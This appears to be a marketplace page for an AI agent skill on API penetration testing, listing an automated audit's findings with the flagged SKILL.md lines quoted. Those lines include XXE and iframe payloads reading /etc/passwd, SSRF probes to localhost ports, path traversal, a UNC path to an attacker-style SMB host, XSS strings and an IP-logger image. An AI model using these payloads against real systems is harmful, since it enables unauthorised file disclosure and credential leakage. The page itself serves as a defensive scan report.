Skip to main content

api-fuzzing-bug-bounty

Provides techniques for testing API security, identifying vulnerabilities, and conducting penetration testing for REST, SOAP, and GraphQL APIs.

Install this skill

or
53/100

Security score

The api-fuzzing-bug-bounty skill was audited on Mar 9, 2026 and we found 15 security issues across 3 threat categories, including 2 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

medium line 419

Curl to non-GitHub URL

SourceSKILL.md
419curl -X POST https://target.com/graphql \
high line 140

Access to /etc/passwd

SourceSKILL.md
140<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
high line 297

Access to /etc/passwd

SourceSKILL.md
297<iframe src="file:///etc/passwd" height=1000 width=800>
low line 59

External URL reference

SourceSKILL.md
59kr scan https://target.com -w routes-large.kite
low line 146

External URL reference

SourceSKILL.md
146<object data="http://127.0.0.1:8443"/>
low line 147

External URL reference

SourceSKILL.md
147<img src="http://127.0.0.1:445"/>
low line 155

External URL reference

SourceSKILL.md
155https://example.org/download?filename=a.png
low line 156

External URL reference

SourceSKILL.md
156https://example.org/download?filename=C:\inetpub\wwwroot\web.config
low line 157

External URL reference

SourceSKILL.md
157https://example.org/download?filename=\\smb.dns.attacker.com\a.png
low line 251

External URL reference

SourceSKILL.md
251http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
low line 254

External URL reference

SourceSKILL.md
254http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
low line 300

External URL reference

SourceSKILL.md
300<object data="http://127.0.0.1:8443"/>
low line 303

External URL reference

SourceSKILL.md
303<img src="http://127.0.0.1:445"/>
low line 306

External URL reference

SourceSKILL.md
306<img src="https://iplogger.com/yourcode.gif"/>
low line 419

External URL reference

SourceSKILL.md
419curl -X POST https://target.com/graphql \
Scanned on Mar 9, 2026
View Security Dashboard

Install this skill with one command

/learn @sickn33/api-fuzzing-bug-bounty
GitHub Stars 21.5K
Rate this skill
Categorydevelopment
UpdatedMarch 29, 2026
openclawapitestingml-ai-engineersecurity-engineerbackend-developerqa-engineerproduct-managerdevelopmentproduct
sickn33/antigravity-awesome-skills